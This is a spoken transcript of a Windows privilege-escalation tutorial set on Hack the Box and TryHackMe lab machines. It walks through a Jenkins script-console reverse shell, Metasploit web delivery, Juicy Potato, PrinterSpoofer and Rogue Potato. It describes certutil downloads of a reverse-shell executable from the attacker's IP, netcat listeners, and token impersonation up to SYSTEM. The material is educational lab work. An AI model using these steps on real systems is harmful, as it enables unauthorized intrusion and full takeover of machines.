Okay, so now we are going to be looking at Rogue Potato, Juicy Potato, and PrinterSpoofer. These are all going to be using token impersonation. And so we're actually going to be using Juicy Potato through Metasploit, and then we're going to do Rogue Potato manually, and then also PrinterSpoofer manually. And I think it's helpful for you to know all these three different ways because you are going to encounter them in the future. You will encounter the SE impersonation. You're going to come into SE impersonation anytime you get remote code execution on a Windows machine coming from a Windows program that executes your code. And so this is probably going to be about 30% of the time you're going to have access to these potato attacks or the printer spoofer. So you're going to want to know these for sure in the future. And you might even see them on some certification exams. So you'll want to know these and you'll want to know them well.
You are without doubt the worst pirate I've ever heard of. But you have heard of me.
So in the first part of this video, we're going to be doing the box Jeeves from Hack the Box. It's a really easy video. I'm going to go ahead and walk you through how to get a shell in this box really fast. So that way we can go right to the privilege escalation portion of the box. And so if you want to follow along, you can go ahead and open up Hack the Box and start the machine Jeeves. And we're going to work through this together. It's a really simple box and you're going to be exploiting Jenkins. And this is something I do come across every now and then. So you will want to know how to exploit Jenkins because you are going to see this again in the future along with the privilege escalation of a potato attack.
Jinkies, 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 Jinkies.
And then once we finish Jenkins, we're going to move back over to TryHackMe like we did with the previous portion of this crash course. And we're going to be going through Rogue Potato and the printer spoofer. And this is going to be a little bit complicated, especially if you're new, and you're probably going to have to watch this a couple of times and then Google what you don't understand. So if you're new, this might be a little bit over your head, but that's okay. Just watch it a couple of times, Google what you don't understand because you will want to know this for the future. And one thing that's also going to help you if you're new, if you missed the first part of this privilege escalation course, make sure to go back and watch that because it's really going to help you understand the file paths and transferring over your exploits and your reverse shells and how to move your tools over to the Windows machine from your Kali machine. So now we're ready to start the box Jeeves, and I just want to say that the way I came across this was I just Googled box on Hack the Box that uses a potato attack. This popped up as an easy box, so it is the one I went ahead and went with. I did do this box several years ago, and because it is such an easy box, I did zero prep and zero practice, so you are going to see me mess up a couple of times. I did leave my mess ups in there so you could kind of see me troubleshoot some of my exploits that I am trying to get to work. And also I do not use Metasploit a lot, so a lot of the commands were not fresh in my mind, but that's okay. I decided to leave in these mess ups and not reshoot this entire video because I want you to see that I mess up and how I mess up and then work through the problems that I encounter. So with that, let's go ahead and jump into it. Okay, so I have gone ahead and opened up the box Jeeves on Hack the Box and ran an nmap scan. So that way we have the open ports here, and I'm just going to go ahead and tell you that we're going to look at port 80 and port 50,000. So what we can do is just type in the IP address and then go to it. And we are brought to this Ask Jeeves page right here. And if you search, nothing really works out for us. So we'll go ahead and check out 50,000. And we see we have this problem, this 404. So automatically what we should do is run fuff, and we can come back here and run 10.63. And we're actually going to need to run a different word list because this specific word list that we have going right here doesn't have the directory in it that we want. We want to run dirbuster, and then we want to run a directory list and 2.3, and we want the medium text just like this. So we press enter and this will start running for us, and hopefully it will pull back for us what we need. And actually I did that wrong. We need to be fuzzing port 50,000, so we can come back to our IP and we're going to tell it we want port 50,000. That looks right, so we'll run that, and then we see we have this Ask Jeeves right here, and this is not the only CTF that has this Ask Jeeves right here. So you're going to want to remember how to do this exploit with this Jenkins service. It won't be Ask Jeeves, it'll be a Jenkins service. because I just saw this a few weeks ago on a different platform, and for some reason the box seems to be going kind of slow. Hopefully it doesn't affect anything, but we can come in and look at this manage Jenkins. There's two different ways to get a shell on this box. We're going to do just the simple way. We can go to the script console, and then anything we put in here will execute on the server and give us a shell back. The other way is to actually come and create a project and do a build history, and you can execute code by actually compiling it and clicking build, but we're not going to do that in this specific example. So now what we can do is we can just come to Google, just type in Jenkins reverse shell and check out a GitHub page. And I think I have a typo in there. I do, but we want this one right here, this Java reverse shell, and this right here will work for us. So we can go raw, Command A, Command copy, come back to this little console, to the beginning. We're going to change to our IP address, and mine is 10.10.14.5. And we can use port 8044, that's fine. So we come over here and say netcat lvmp 80444 run. Now that we're listening, we can run this, and hopefully we get a shell back over here when it executes, and we do. So now what we want to do is send this over to a Meterpreter session. So we can open up a new tab and type in mfs console, just like this, and let this run. And then we are going to set up what we need to move the shell from over here, our netcat listener, to the Metasploit console. So what we'll want to do now is type in use exploit multi-script web delivery, just like this. We can type in options to see what our options are. We're going to show targets, and we're going to use 2. This 2 right here is a PowerShell. We'll set target to 2 since use doesn't work for us. So now that should be set. We can set the payload to Windows Meterpreter reverse TCP, just like this. And then we're going to set our L host to ton 0. We will set the SRV host to ton 0 as well. And then we can look at our options again and make sure everything looks right. And it does, so we can type in run, and it's going to give us this little PowerShell script right here, and it's going to be base64 encoded. The reason this is base64 encoded is because sometimes Windows likes to use PowerShell with base64 encoding. You're actually going to come across this quite a lot. And we'll run this and see if we can get a shell back over here. And it did not work for us. Let's try this again. And it says now that it's working, so we have our shell. So now we can type in sessions, and we can say use session. I think we type in sessions-I1 to get an interactive shell, and then we say who am I? And it says unknown. What happens if we just type shell? Who am I? And now we have our shell working over here for us. And so we can say background, put that in the background for us. Okay, do we want to exit? Yes, we can background from here. And now that is set in the background. And what we'll want to do is run the multi-exploit suggester for Windows. So we'll type in use post multi-recon local exploit suggester options, and then we want to tell it to set session to 1 and then run, and this will run for us, and it's going to tell us that we can use Juicy Potato. Okay, so that took a little while to run and it got interrupted. I'm going to go ahead and just use Juicy Potato for us. So what we're going to do is type in use exploit, and then we want ms16_075 and see if it's in here. Let's just search JUIC, see if anything comes down, and we have right here. This one is what we want to use. So we will use 1 options, and we want to set session to 1, and then run this and see if we can get a shell back. Had an issue the first couple of times because I did not change my local host to ton 0, and now I have fixed that, and it says the session is open but no session was created. So now what we'll want to do is go to that session, so we can type in session 2 and we can run this, and then we can check to see if we have any tokens, so we can tell it to load incognito, and then I spelled that wrong, so load incognito, and then we want to tell it to list tokens -u. I think that is how we list those, and it tells us we can use int authority system. So we'll go ahead and copy this right here so we have it spelled right, and then we're going to say impersonate token, and then we want to paste that in what we just copied, and it tells us that it is not spelled correctly. Let's try copying this instead. So we'll delete this, paste, and it says that it works. So if we say who am I, we can go shell who am I, and we are authority systems. Okay, so at this point we're going to transition over to TryHackMe. So if you'd like to follow along, you can go ahead and connect your VPN and open up the Windows PrivEsc box, and we're going to go ahead and start working through this. Also, another reminder, if you are new to this course and you haven't watched the previous one, it will be helpful for you, especially if you're new to the world of penetration testing and Windows privilege escalation, to watch part 1 of this series. It will make a lot more sense before you start this second portion. So let's go ahead now and jump into it. Okay, so I have gone ahead and launched the box that we are going to be working through. This is the same as the previous section of Windows privilege escalation that we were working through, and you can double click this and put it into your terminal, launch it, and you will have access to the RDP session. Now, what we will do first is the printer spoofer, because it is the easiest, and then we'll go ahead and do Rogue Potato, and I'll try to walk you through what exactly is going on and how it works. The first thing we have to do is get a shell, so we can copy this, come over to our RDP session, open up a command prompt, and we're going to need to run this as administrator. And the reason we have to run this as administrator is because we're going to be using psexec, and psexec is a Windows system that is going to give us a shell back, and we're going to tell it we want a shell back as a local user, and the password is password 123. And now if we say who am I, it's going to tell us we are the admin. So if we run a who am I /priv like this, we're looking for this SE impersonate privilege right here, and it says that it is enabled, and it's going to be enabled as admin, but it will also be enabled as a local user if you come through some kind of Windows system, which is why we're coming through psexec. A lot of times in the wild, when you come across this SE impersonate privilege and it's enabled, it's because you've uploaded some kind of file and it's been executed on the server, and it comes through a Windows process. So in order for us to have this as a low-level user, we're going to have to use that payload that we had copied. So we'll come back over here because apparently it is not on my clipboard. Paste it in, and we need to pull our shell over. So I always call mine rev.exe, and before we're able to do that, we're going to have to create our payload, which I think I already created. It's the same thing we did last time. We'll just use this MSF Venom. You'll change your port and you'll call it rev.exe. So we'll go ahead and close out of that, and I'll pull that over the same way we did last time. Cert util -url cache -f -split http 10.2.1.2 is my IP, and then /rev.exe, and that is not a dot. And then we can come over here and go sudo python simple server, and we'll run this, and it'll come over and grab our reverse shell. So now if we say dir, we put that in the wrong spot, whoopsie doopsie. We'll go ahead and cancel that. but we'll get our shell here and then we'll move it in a second. So actually, we'll just go ahead and move it now. cd dot dot cd dot dot cd privesc. And the reason I'm using the privesc file this time and I didn't last time is because they already have the printer spoofer in here somewhere. And we're gonna go ahead and just use this exe, and I'll show you how to pull it over so that way we don't have to type in the same cert util a bunch of times. So we'll pull over our reverse shell into the right place, and then we will have to run it. So we'll just copy this and say rev.exe, and we'll need to make sure we are listening. So now we are listening, so now we can run this like this. And the reason we want to run the command they have right here is because we have to run as psexec, and now it has finally ran, and we should get our shell back, but we did not run rev.exe. And now if we say who am I /priv, you will see that we have a lot less permissions, but we still have the se impersonate. And if we just say, who am I, you're gonna see that we're local service instead of admin. So what we'll do now for the printer spoofer is we can just come back, cd into the privesc, and we can run the printer spoofer. So we should be able to just type in, let's see if we can just run the printer. Let's see if we can just run PrinterSpoofer.exe, and it does not let us. It says it's unrecognized, and it is possible that it didn't work because I didn't run it with these capitals, but we'll just go ahead and for the sake of this, we'll just give it the full path, and we'll say PrinterSpoofer, and it tells us we need to enter in our commands. So we should be able to run the printerspoofer.exe with the -h, and it will tell us what we need to do. It tells us we need to execute the command line, and it tells us that we need it to interact with the process, and we need it to run a command. The command we're going to run is our reverse shell. So what we can do is just paste that back in there. We're going to tell it the command we want to run is our reverse shell. So we're just going to say rev.exe and then close off the quotes, and we'll say -i, and then we should be able to open up a new netcat listener over here. And if we run this, it's going to tell us that it is using the se impersonate privilege and see if it can create a new shell, and it does. And so if we say who am I, we are now authority system. So that is the printer spoofer. Now we're going to go ahead and check out the token impersonation with Rogue Potato right here. So now we have our shell. We'll go back to cd privesc, and now that we're back in here, we'll have the Rogue Potato sitting in here somewhere right here. And I want to walk you through what is happening over here. So the way Rogue Potato works is a little different than Juicy Potato. Juicy Potato, we're able to just use port 135 for the RPC client, and you'll see this open sometimes, but Windows changed it for Rogue Potato, making it so that we had to get the token through port 9999. And so what this does is we basically just send the request to our attack machine that then redirects it back to the Windows machine to port 9999. So that's what this one line does right here. And then when we run Rogue Potato, we just tell it our remote IP address, the shell we want it to execute, and that we're going to be listening on port 999. So it is possible that this won't work with our exe, because I have had trouble in the past getting this to work with the exe, and I've had to use a PowerShell, and we might have to go ahead and do that, but we'll try it this way first, and then if that doesn't work, we'll use PowerShell. So we will need to get our shell, which we've already done. We're going to set up this listener right here. And so rather than me typing all this out, we're going to just copy it, paste it, and now we have this forward working for us right here. It's going from port 135 to 999 on the Windows box that we are attacking. And we can use this Rogue Potato that is set out for us right here. So we'll paste that in, and then you'll have to use your actual IP that you are running with, and mine is 10.2.1.182. And then we are going to execute our reverse shell, and we'll be listening on port 9999. So we'll come back over here, set up our netcat listener on port 9999, and we can finish typing this out. So we want to execute our reverse shell. We'll copy this so I don't have any typos, /rev.exe, close that off. And then we want to listen on 9999. So we'll run this and see if we get a hit back over here. Sometimes it takes a few seconds, but if we don't, we'll run it a couple of times. And if this doesn't work, we will use the PowerShell version, because I have had trouble in the past getting this to work. I needed to be listening on port 444 over here and not port 999. So we'll copy this again, paste, enter, and we get our shell back. Who am I? And we are authority system. So that was kind of a workaround. So we don't actually need to run that with PowerShell. I just was listening on the wrong port because I had this in my mind and not port 444, which is what we set up with our reverse shell. So that is how you would use the Rogue Potato with the port forwarding over here from our local machine to the attack machine. Okay, and that concludes part 2 of our Windows privilege escalation. In the next portion, we're going to be looking at exploiting Windows files and Windows programs that are vulnerable, and maybe doing some password hunting. If you're interested in the third part, I will see you in the next video.